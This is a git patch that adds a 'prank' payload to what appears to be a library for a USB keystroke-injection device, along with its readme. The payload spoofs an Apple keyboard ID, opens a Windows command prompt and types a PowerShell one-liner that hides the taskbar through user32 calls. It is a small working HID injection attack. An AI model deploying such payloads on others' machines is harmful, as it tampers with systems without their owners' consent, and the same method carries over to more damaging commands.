From 5548c0b1cd5d4970fe954a66cb6de4754091ed3b Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Mon, 29 Jun 2020 17:53:18 +0100 Subject: [PATCH] Add hide-startbar payload (#418) * Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md --- .../library/prank/hide-startbar/payload.txt | 30 +++++++++++++++++++ .../library/prank/hide-startbar/readme.md | 28 +++++++++++++++++ 2 files changed, 58 insertions(+) create mode 100644 payloads/library/prank/hide-startbar/payload.txt create mode 100644 payloads/library/prank/hide-startbar/readme.md diff --git a/payloads/library/prank/hide-startbar/payload.txt b/payloads/library/prank/hide-startbar/payload.txt new file mode 100644 index 00000000..fe2f74e9 --- /dev/null +++ b/payloads/library/prank/hide-startbar/payload.txt @@ -0,0 +1,30 @@ +# Title: Hide-StartBar +# Description: Hides the Windows startbar +# Author: Cribbit +# Version: 1.0 +# Category: pranks +# Target: Windows 7+ (Powershell) +# Attackmodes: HID +# Extensions: Run +# Notes: 0x0080 = SWP_HIDEWINDOW, 0x0040 = SWP_SHOWWINDOW + +LED SETUP + +ATTACKMODE HID VID_0X05AC PID_0X021E + +LED ATTACK + +Q DELAY 200 +RUN WIN "cmd" +Q DELAY 100 +Q STRING "mode con:cols=18 lines=1" +Q ENTER +Q STRING "color FE" +Q ENTER +Q STRING "powershell \"\$w=Add-Type -Namespace Win32 -Name Funcs -PassThru -MemberDefinition '[DllImport(\\\"user32.dll\\\")] public static extern IntPtr FindWindow(String C, String A); [DllImport(\\\"user32.dll\\\")] public static extern bool SetWindowPos(IntPtr H,IntPtr A,int X,int Y,int C,int D,uint F);';\$w::SetWindowPos(\$w::FindWindow('Shell_traywnd',''),0,0,0,0,0,0x0080);\"" +Q DELAY 100 +Q ENTER +Q STRING exit +Q ENTER + +LED FINISH diff --git a/payloads/library/prank/hide-startbar/readme.md b/payloads/library/prank/hide-startbar/readme.md new file mode 100644 index 00000000..83e44fb6 --- /dev/null +++ b/payloads/library/prank/hide-startbar/readme.md @@ -0,0 +1,28 @@ +# Hide Startbar +* Author: Cribbit +* Version: 1.0 +* Target: Windows 7+ (Powershell) +* Category: pranks +* Attackmode: HID +* Extensions used: Run + +## Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.0 | Initial release | + +## Description +Hides the Window Start bar + +## Configuration +Change hex to hide or show the startbar +``` +0x0080 = SWP_HIDEWINDOW, 0x0040 = SWP_SHOWWINDOW +``` + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISH | Green blink followed by SOLID | Script is finished |